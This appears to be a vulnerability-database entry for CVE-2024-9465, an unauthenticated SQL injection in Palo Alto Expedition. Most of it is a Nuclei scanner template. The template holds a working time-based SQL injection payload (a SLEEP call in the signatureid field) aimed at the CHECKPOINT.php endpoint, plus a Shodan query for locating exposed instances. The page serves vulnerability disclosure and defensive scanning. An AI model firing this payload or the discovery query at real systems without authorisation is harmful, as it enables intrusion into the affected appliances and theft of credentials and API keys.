CVE-2024-9465: Palo Alto Expedition - SQL Injection

日期: 2025-08-01 | 影响软件: Palo Alto Expedition | POC: 已公开

漏洞描述

An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.

PoC代码[已公开]

id: CVE-2024-9465

info:
  name: Palo Alto Expedition - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
    - https://github.com/horizon3ai/CVE-2024-9465/tree/main
    - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9465
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-9465
    cwe-id: CWE-89
    epss-score: 0.94186
    epss-percentile: 0.99916
  metadata:
    verified: true
    max-request: 2
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: time-based-sqli,cve,cve2024,palo-alto,sqli,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get&type=existing_ruleBases&project=pandbRBAC

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "ruleBasesNames")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100927e4a1878c555ba912f5045460084489e31f9da7051f1cf6610b62a6fc95ed3022100b1e1f0e40d9c3a9cecb38433a77206cf1142c0b88a79d2ab2dc5aa0303e7d080:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9465.yaml

相关漏洞推荐